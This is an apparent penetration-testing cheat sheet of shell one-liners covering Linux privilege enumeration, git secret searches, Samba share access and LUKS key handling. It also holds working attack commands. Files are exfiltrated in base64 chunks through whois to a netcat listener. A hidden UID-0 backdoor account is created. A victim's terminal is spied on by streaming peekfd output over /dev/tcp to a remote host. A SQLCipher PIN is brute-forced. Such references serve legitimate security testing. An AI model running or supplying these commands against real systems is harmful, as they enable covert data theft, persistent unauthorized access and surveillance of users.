[[_TOC_]]

Enumeration
===========
#### File permissions
##### Find SUIDs

    find / -perm /4000 -exec ls -ldb {} \;

##### Find SGIDs

    find / -perm /2000 -exec ls -ldb {} \;

##### Find SUIDs and SGIDs

    find / -perm /6000 -exec ls -ldb {} \;

##### Find world writable files

    find / -writable -type f 2>/dev/null | grep -Ev '(sys|proc|dev)'
    find / -perm -222 -type f 2>/dev/null | grep -Ev '(sys|proc|dev)'
    find / -perm -o w -type f 2>/dev/null | grep -Ev '(sys|proc|dev)'

##### Find world writable directories

    find / -writable -type d 2>/dev/null | grep -Ev '(sys|proc|dev)'
    find / -perm -222 -type d 2>/dev/null | grep -Ev '(sys|proc|dev)'
    find / -perm -o w -type d 2>/dev/null | grep -Ev '(sys|proc|dev)'

##### Find world executable directories

    find / -perm -o x -type d 2>/dev/null

##### Find world writable and executable directories

    find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

#### Git
##### Search repository for keyword

    for i in $(git ls-tree -r master | cut -d " " -f 3 | cut -f 1); do
        echo -e "${i}";
        git cat-file -p ${i} | grep -i <keyword>;
    done

or

    for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep -i <keyword>; done

#### enum4linux
##### Enumerate users

    enum4linux -U 192.168.1.1

##### Retrieve password policy

    enum4linux -P 192.168.1.1

Exfiltration
============
#### whois exfiltration
#### netcat listener

    ncat -lvp 8000 | tee exfil.b64

##### One chunk

    whois -r 192.168.1.1 -p 8000 $(base64 /tmp/file.txt -w0)

##### Tar and 2048 chunks

    tar czf - /path/to/directory/* | base64 | xargs -l 2048 timeout 0.03 whois -h 192.168.1.1 -p 8000 2048

##### Decode data

    cat exfil.b64 | tr -d '\r\n' | base64 -d (| tar xvz)

#### Python
##### Curl POST request with Python
With URL encoding

    python -c "
    import urllib
    import urllib2
    print urllib2.urlopen(urllib2.Request('http://google.com', 'data=urllib.urlencode({\"parameter\": \"value\"})')).read()"

Without URL encoding

    python -c "
    import urllib2
    print urllib2.urlopen(urllib2.Request('http://google.com', 'data=<post_data>')).read()"

Reconnaissance
==============
##### avahi-browse 
Requires avahi-utils package

    avahi-browse -a -v -r

Misc
====
##### Add secondary root user

    useradd -o -u 0 -g 0 <username> && echo "<username>:<password>" | chpasswd

##### Generate NTLM hash with Python

    python -c "import hashlib,binascii; print binascii.hexlify(hashlib.new('md4', '<password>'.encode('utf-16le')).digest())"

##### Crack SQLite cipher

    for i in {0000..9999}; do echo "PRAGMA key = '$i'; \
        ATTACH DATABASE 'plaintext.db' AS plaintext KEY ''; \
        SELECT sqlcipher_export('plaintext'); \
        DETACH DATABASE plaintext;" | sqlcipher $1 2>/dev/null && echo "Pin Found: $i"; \
    done

##### Base64 encoding comptabile with Windows Powershell

    echo "command" | iconv --to-code UTF-16LE | base64 -w 0

##### Spy on TTY
Sent over the network

    peekfd -n8dc <bash_pid> 0 1 2 >& /dev/tcp/192.168.1.1/8000 0>&1

View locally

    peekfd -n8dc <bash_pid>

##### Insert every N lines

    awk '{print;} NR % N == 0 {print "INSERT_THIS"; }' input_file.txt

##### interfaces file for ethernet gadget (RPi0)
This file should be located in /etc/network/interfaces
It assigns static addressing for the Pi Zero's micro usb
gadget interface, i,e. usb0
After connecting the Pi Zero's micro usb interface to
your host computer's USB interface and
assuming you're on Linux, you must open you network manager
e.g. NetworkManager applet, and set the Wired Connection's
method to Manual (not DHCP), as follows:
Address: 192.168.7.1
Netmask: 24 or 255.255.255.0
Gateway: 192.168.7.1

Then you should be able to reach the Pi Zero by SSHing at
192.168.7.2

    auto lo
    iface lo inet loopback

    allow-hotplug usb0
    iface usb0 inet static
        address 192.168.7.2
        netmask 255.255.255.0
        network 192.168.7.0
        broadcast 192.168.7.255
        gateway 192.168.7.1

Samba
=====
#### smbclient
##### Anonymous share listing

    smbclient -L 192.168.1.1

##### Anonymous share listing with supressed password

    smbclient -N -L 192.168.1.1

##### Authenticated share listing

    smbclient -U 'user%password' -L 192.168.1.1

##### Anonymous share access

    smbclient \\\\192.168.1.1\\share

##### Anonymous share access with suppressed password

    smbclient -N \\\\192.168.1.1\\share
    
##### Authenticated share access

    smbclient -U 'user%password' \\\\192.168.1.1\\share

##### Authenticated share access with domain

    smbclient -U 'user%password' \\\\192.168.1.1\\share -W MYDOMAIN

#### smbget
##### Download all files with smbget

    smbget -R smb://192.168.1.1/share/path/to/dir -U user

#### impacket
##### impacket smb server

    smbserver.py share /tmp

#### Samba config
Relatively secure samba config

    [global]
        bind interfaces only = Yes
        client max protocol = SMB3
        client min protocol = SMB2
        disable netbios = Yes
        domain master = No
        interfaces = lo eth0 # check this
        local master = No
        log file = /var/log/samba/smb_%m.log
        max log size = 10000
        preferred master = No
        security = USER
        server role = standalone server
        server string = myhostname # change this
        smb ports = 445 139
        # socket options = IPTOS_LOWDELAY TCP_NODELAY
        idmap config * : backend = tdb
        restrict anonymous = 2
        server signing = mandatory
        
    [myshare]
        browseable = Yes
        force create mode = 0660
        force directory mode = 2770
        path = /path/to/share
        read only = No
        valid users = user1 user2

LUKS
====
##### Identify LUKS

    blkid -t TYPE=crypto_LUKS -o device

##### Find information on LUKS device

    cryptsetup luksDump /dev/sdXY

##### Backup LUKS passphrase data

    dd if=/dev/sdXY bs=1 count=2066432 of=./sdXY-to-crack

##### Test passphrase against backup

    cryptsetup --test-passphrase open ./sdXY-to-crack

##### Change LUKS passphrase (slot 0)

    cryptsetup luksChangeKey /dev/sdXY -S 0

##### Backup LUKS header

    cryptsetup luksHeaderBackup /dev/sdXY --header-backup-file /path/to/sdXY-luks-header.backup

##### Restore LUKS header

    cryptsetup luksHeaderRestore /dev/sdXY --header-backup-file /path/to/sdXY-luks-header.backup

##### Backup LUKS master key

    cryptsetup luksDump -q --dump-master-key /dev/sdXY > /path/to/sdXY-master.key

##### Convert LUKS master key to binary

    cryptsetup luksDump -q --dump-master-key /dev/sdXY | \
    grep -A 3 'MK dump' | \
    sed -e 's/MK dump://g' -e 's/\s//g' | \
    xxd -r -p > sdXY-luks-master.bin

##### Manipulate LUKS key slots with master key

    cryptsetup luksAddKey /dev/sdXY --master-key-file /path/to/sdXY-luks-master.bin

